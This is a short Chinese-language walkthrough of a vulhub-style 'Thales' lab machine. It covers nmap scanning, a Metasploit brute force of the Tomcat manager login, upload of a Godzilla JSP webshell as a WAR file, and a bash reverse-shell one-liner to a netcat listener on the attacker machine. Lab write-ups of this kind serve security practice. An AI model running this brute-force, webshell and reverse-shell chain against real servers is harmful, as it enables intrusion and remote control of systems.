vulhub靶场Thales通关攻略
环境配置
靶机和攻击机(kali)都设置为桥接模式,记住靶机的MAC地址
nmap扫ip
根据MAC地址判断靶机ip为172.16.2.32
nmap扫端口
发现开启了22和8080两个端口
访问http://172.16.2.32:8080
发现是tomcat的页面
点击右侧的按钮
弹出了登录框
在kali使用msf爆破
启动msf
msfconsole
search tomcat login
use 0
show options
set rhosts 172.16.2.32
run两次后成功爆出账号密码
tomcat:role1
登录进入后台界面
点击左上角管理器应用程序列表
部署war包
这里上传哥斯拉jsp木马(压缩为zip改后缀为war)
上传了gsl.war,其中的文件叫shell.jsp,我们木马在/gsl目录下(重启了一下ip变了)
哥斯拉连接成功,命令执行
kali开启nc监听
nc -lvvp 6666
哥斯拉命令执行输入
/bin/bash -c 'bash -i >& /dev/tcp/172.16.2.36/6666 0>&1'